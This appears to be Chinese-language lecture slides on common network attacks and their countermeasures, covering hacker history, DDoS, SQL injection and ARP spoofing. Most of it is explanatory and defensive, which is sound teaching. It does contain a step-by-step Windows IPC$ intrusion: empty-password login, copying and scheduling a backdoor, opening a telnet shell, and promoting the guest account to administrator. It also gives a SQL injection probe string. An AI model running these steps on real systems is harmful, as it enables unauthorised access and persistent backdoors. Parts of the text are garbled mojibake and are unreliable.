網絡攻擊的常見手段

與防范措施01什么是網絡安全？02網絡安全的主要特性目錄一、計算機網絡安全的概念什么是網絡安全？網絡安全：網絡安全是指網絡系統的硬件、軟件及其系統中的數據受到保護，不因偶然的或者惡意的原因而遭受到破壞、更改、泄露，系統連續可靠正常地運行，網絡服務不中斷。網絡安全的主要特性保密性信息不泄露給非授權用戶、實體或過程，或供其利用的特性。完整性數據未經授權不能進行改變的特性。即信息在存儲或傳輸過程中保持不被修改、不被破壞和丟失的特性?？捎眯钥杀皇跈鄬嶓w訪問并按需求使用的特性。即當需要時能否存取所需的信息。例如網絡環境下拒絕服務、破壞網絡和有關系統的正常運行等都屬于對可用性的攻擊；可控性對信息的傳播及內容具有控制能力?？蓪彶樾猿霈F安全問題時提供依據與手段01入侵技術的歷史和發展02一般攻擊步驟03攻擊實例與攻擊方式目錄二、常見的網絡攻擊黑客黑客是程序員，掌握操作系統和編程語言方面的知識，樂于探索可編程系統的細節，并且不斷提高自身能力，知道系統中的漏洞及其原因所在。專業黑客都是很有才華的源代碼創作者。起源：20世紀60年代目的：基于興趣非法入侵基于利益非法入侵信息戰KevinMitnick凱文?米特尼克是世界上最著名的黑客之一，第一個被美國聯邦調查局通緝的黑客。1979年，15歲的米特尼克和他的朋友侵入了北美空中防務指揮系統。莫里斯蠕蟲（MorrisWorm）

時間1988年肇事者羅伯特·塔潘·莫里斯,美國康奈爾大學學生，其父是美國國家安全局安全專家機理利用sendmail,finger等服務的漏洞，消耗CPU資源，拒絕服務影響Internet上大約6000臺計算機感染，占當時Internet聯網主機總數的10%，造成9600萬美元的損失黑客從此真正變黑，黑客倫理失去約束，黑客傳統開始中斷。2001年中美黑客大戰事件背景和經過中美軍機南海4.1撞機事件為導火線4月初，以PoizonB0x、pr0phet為代表的美國黑客組織對國內站點進行攻擊，約300個左右的站點頁面被修改4月下旬，國內紅（黑）客組織或個人，開始對美國網站進行小規模的攻擊行動，4月26日有人發表了“五一衛國網戰”戰前聲明，宣布將在5月1日至8日，對美國網站進行大規模的攻擊行動。各方都得到第三方支援各大媒體紛紛報道，評論，中旬結束大戰PoizonB0x、pr0phet更改的網頁中經網數據有限公司中國科學院心理研究所國內某政府網站國內某大型商業網站國內黑客組織更改的網站頁面美國勞工部網站美國某節點網站美國某大型商業網站美國某政府網站這次事件中采用的常用攻擊手法紅客聯盟負責人在5月9日網上記者新聞發布會上對此次攻擊事件的技術背景說明如下：“我們更多的是一種不滿情緒的發泄，大家也可以看到被攻破的都是一些小站，大部分都是NT/Win2000系統，這個行動在技術上是沒有任何炫耀和炒作的價值的。”主要采用當時流行的系統漏洞進行攻擊這次事件中被利用的典型漏洞用戶名泄漏，缺省安裝的系統用戶名和密碼Unicode編碼可穿越firewall,執行黑客指令ASP源代碼泄露可遠程連接的數據庫用戶名和密碼SQLserver缺省安裝微軟Windows2000登錄驗證機制可被繞過Bind遠程溢出，Lion蠕蟲SUNrpc.sadmind遠程溢出，sadmin/IIS蠕蟲Wu-Ftpd格式字符串錯誤遠程安全漏洞拒絕服務(syn-flood,ping)19801985199019952000密碼猜測可自動復制的代碼密碼破解利用已知的漏洞破壞審計系統后門會話劫持擦除痕跡嗅探包欺騙GUI遠程控制自動探測掃描拒絕服務www攻擊工具攻擊者入侵者水平攻擊手法半開放隱蔽掃描控制臺入侵檢測網絡管理DDOS攻擊2002高入侵技術的發展01入侵技術的歷史和發展02一般攻擊步驟03攻擊實例與攻擊方式目錄常見的攻擊方法端口掃描：網絡攻擊的前奏網絡監聽：局域網、HUB、ARP欺騙、網關設備郵件攻擊：郵件炸彈、郵件欺騙網頁欺騙：偽造網址、DNS重定向密碼破解：字典破解、暴力破解、md5解密漏洞攻擊：溢出攻擊、系統漏洞利用種植木馬：隱蔽、免殺、網站掛馬、郵件掛馬DoS、DDoS：拒絕服務攻擊、分布式拒絕服務攻擊cc攻擊：借助大量代理或肉雞訪問最耗資源的網頁XSS跨站攻擊、SQL注入：利用變量檢查不嚴格構造javascript語句掛馬或獲取用戶信息，或構造sql語句猜測表、字段以及管理員賬號密碼社會工程學：QQ數據庫被盜端口判斷判斷系統選擇最簡方式入侵分析可能有漏洞的服務獲取系統一定權限提升為最高權限安裝多個系統后門清除入侵腳印攻擊其他系統獲取敏感信息作為其他用途常見的系統入侵步驟IP地址、主機是否運行、到要入侵點的路由、主機操作系統與用戶信息等。攻擊步驟1.收集主機信息

Ping命令判斷計算機是否開著，或者數據包發送到返回需要多少時間

Tracert/Tracerout命令跟蹤從一臺計算機到另外一臺計算機所走的路徑

Finger和Rusers命令收集用戶信息

Host或者Nslookup命令，結合Whois和Finger命令獲取主機、操作系統和用戶等信息應用的方法：獲取網絡服務的端口作為入侵通道。2.端口掃描1.TCPConnect() 2.TCPSYN3.TCPFIN 4.IP段掃瞄5.TCP反向Ident掃瞄 6.FTP代理掃瞄7.UDPICMP不到達掃瞄 7種掃瞄類型：3、系統漏洞利用

一次利用ipc$的入侵過程1.C:\>netuse\\x.x.x.x\IPC$“”/user:“admintitrator”

用“流光”掃的用戶名是administrator，密碼為“空”的IP地址2.C:\>copysrv.exe\\x.x.x.x\admin$

先復制srv.exe上去，在流光的Tools目錄下3.C:\>nettime\\x.x.x.x

查查時間，發現x.x.x.x的當前時間是2003/3/19上午11:00，命令成功完成。4.C:\>at\\x.x.x.x11:05srv.exe

用at命令啟動srv.exe吧（這里設置的時間要比主機時間推后）5.C:\>nettime\\x.x.x.x

再查查時間到了沒有，如果x.x.x.x的當前時間是2003/3/19上午11:05，那就準備開始下面的命令。6.C:\>telnetx.x.x.x99

這里會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。

雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了7.C:\>copyntlm.exe\\\admin$

ntlm.exe也在《流光》的Tools目錄中

8.C:\WINNT\system32>ntlm

輸入ntlm啟動（這里的C:\WINNT\system32>是在對方計算機上運行當出現“DONE”的時候，就說明已經啟動正常。然后使用“netstarttelnet”來開啟Telnet服務)9.Telnetx.x.x.x，接著輸入用戶名與密碼就進入對方了10.C:\>netuserguest/active:yes

為了方便日后登陸,將guest激活并加到管理組11.C:\>netuserguest1234

將Guest的密碼改為123412.C:\>netlocalgroupadministratorsguest/add

將Guest變為Administrator01入侵技術的歷史和發展02一般攻擊步驟03攻擊實例與攻擊方式目錄北京時間10月22日凌晨，美國域名服務器管理服務供應商Dyn宣布，該公司在當地時間周五早上遭遇了DDoS（分布式拒絕服務）攻擊，從而導致許多網站在美國東海岸地區宕機，Twitter、Tumblr、Netflix、亞馬遜、Shopify、Reddit、Airbnb、PayPal和Yelp等諸多人氣網站無一幸免。Dyn稱，攻擊由感染惡意代碼的設備發起，來自全球上千萬IP地址，幾百萬惡意攻擊的源頭是物聯網聯系的所謂“智能”家居產品。1、DDoS（分布式拒絕服務）攻擊攻擊現象被攻擊主機上有大量等待的TCP連接；網絡中充斥著大量的無用的數據包；源地址為假制造高流量無用數據，造成網絡擁塞，使受害主機無法正常和外界通訊；利用受害主機提供的傳輸協議上的缺陷反復高速的發出特定的服務請求，使主機無法處理所有正常請求；嚴重時會造成系統死機。分布式拒絕服務攻擊：借助于C/S（客戶/服務器）技術，將多個計算機聯合起來作為攻擊平臺，對一個或多個目標發動DDoS攻擊，從而成倍地提高拒絕服務攻擊的威力分布式拒絕服務攻擊攻擊流程1、搜集資料，被攻擊目標主機數目、地址情況，目標主機的配置、性能，目標的寬帶。2、是占領和控制網絡狀態好、性能好、安全管理水平差的主機做傀儡機。3、攻擊者在客戶端通過telnet之類的常用連接軟件，向主控端發送發送對目標主機的攻擊請求命令。主控端偵聽接收攻擊命令，并把攻擊命令傳到分布端，分布端是執行攻擊的角色，收到命令立即發起flood攻擊。

主機設置所有的主機平臺都有抵御DoS的設置，基本的有：1、關閉不必要的服務2、限制同時打開的Syn半連接數目3、縮短Syn半連接的timeout時間4、及時更新系統補丁網絡設置1.防火墻禁止對主機的非開放服務的訪問限制同時打開的SYN最大連接數限制特定IP地址的訪問啟用防火墻的防DDoS的屬性嚴格限制對外開放的服務器的向外訪問第五項主要是防止自己的服務器被當做工具去害人。2.路由器設置SYN數據包流量速率升級版本過低的ISO為路由器建立logserver防范措施雅虎作為美國著名的互聯網門戶網站，也是20世紀末互聯網奇跡的創造者之一。然而在2013年8月20日，中國雅虎郵箱宣布停止提供服務。就在大家已快將其淡忘的時候，雅虎公司突然對外發布消息，承認在2014年的一次黑客襲擊中，至少5億用戶的數據信息遭竊。此次事件成為了有史以來規模最大的單一網站信息泄露事件。2、SQL注入攻擊攻擊方法SQL注入主要是由于網頁制作者對輸入數據檢查不嚴格，攻擊者通過對輸入數據的改編來實現對數據庫的訪問，從而猜測出管理員賬號和密碼；如/view.asp?id=1；改為/view.asp?id=1anduser=‘admin’；如果頁面顯示正常，說明數據庫表中有一個user字段，且其中有admin這個值；通過SQL注入攻擊可以探測網站后臺管理員賬號和密碼。SQL注入：就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串，最終達到欺騙服務器執行惡意的SQL命令。具體來說，它是利用現有應用程序，將（惡意）的SQL命令注入到后臺數據庫引擎執行的能力，它可以通過在Web表單中輸入（惡意）SQL語句得到一個存在安全漏洞的網站上的數據庫，而不是按照設計者意圖去執行SQL語句。利用探測出的管理員賬號和密碼登陸網站后臺，在擁有附件上傳的功能模塊中嘗試上傳網頁木馬或一句話木馬（一般利用數據庫備份和恢復功能）；通過網頁木馬探測IIS服務器配置漏洞，找到突破點提升權限，上傳文件木馬并在遠程服務器上運行；通過連接木馬徹底拿到系統控制權；因此，SQL注入只是網站入侵的前奏，就算注入成功也不一定可以拿到webshell或root。1、輸入驗證檢查用戶輸入的合法性，確信輸入的內容只包含合法的數據。2、錯誤消息處理防范SQL注入，還要避免出現一些詳細的錯誤消息，因為黑客們可以利用這些消息。要使用一種標準的輸入確認機制來驗證所有的輸入數據的長度、類型、語句、企業規則等。3、加密處理將用戶登錄名稱、密碼等數據加密保存。4、存儲過程來執行所有的查詢SQL參數的傳遞方式將防止攻擊者利用單引號和連字符實施攻擊。此外，它還使得數據庫權限可以限制到只允許特定的存儲過程執行，所有的用戶輸入必須遵從被調用的存儲過程的安全上下文，這樣就很難再發生注入式攻擊了。5、使用專業的漏洞掃描工具6、確保數據庫安全7、安全審評防范措施3、ARP攻擊ARP（AddressResolutionProtocol，地址解析協議）是根據IP地址獲取物理地址的一個TCP/IP協議。ARP攻擊就是通過偽造IP地址和MAC地址實現ARP欺騙，能夠在網絡中產生大量的ARP通信量使網絡阻塞，攻擊者只要持續不斷的發出偽造的ARP響應包就能更改目標主機ARP緩存中的IP-MAC條目，造成網絡中斷或中間人攻擊。ARP攻擊僅能在局域網內進行。ARP請求包是以廣播的形式發出，正常情況下只有正確IP地址的主機才會發出ARP響應包，告知查詢主機自己的MAC地址。局域網中每臺主機都維護著一張ARP表，其中存放著<IP—MAC>地址對。ARP改向的中間人竊聽A發往B：(MACb，MACa，PROTOCOL，DATA)B發往A：(MACa，MACb，PROTOCOL，DATA)A發往B：(MACx，MACa，PROTOCOL，DATA)B發往A：(MACx，MACb，PROTOCOL，DATA)原理：X分別向A和B發送ARP包，促使其修改ARP表主機A的ARP表中B為<IPb—MACx>主機B的ARP表中A為<IPa—MACx>X成為主機A和主機B之間的“中間人”，可以選擇被動地監測流量，獲取密碼和其他涉密信息，也可以偽造數據，改變電腦A和電腦B之間的通信內容。防范措施：網關和終端雙向綁定IP和MAC地址。局域網中的每臺電腦中進行靜態ARP綁定。打開安全防護軟件的ARP防火墻功能。徹底追蹤查殺ARP病毒。01常見的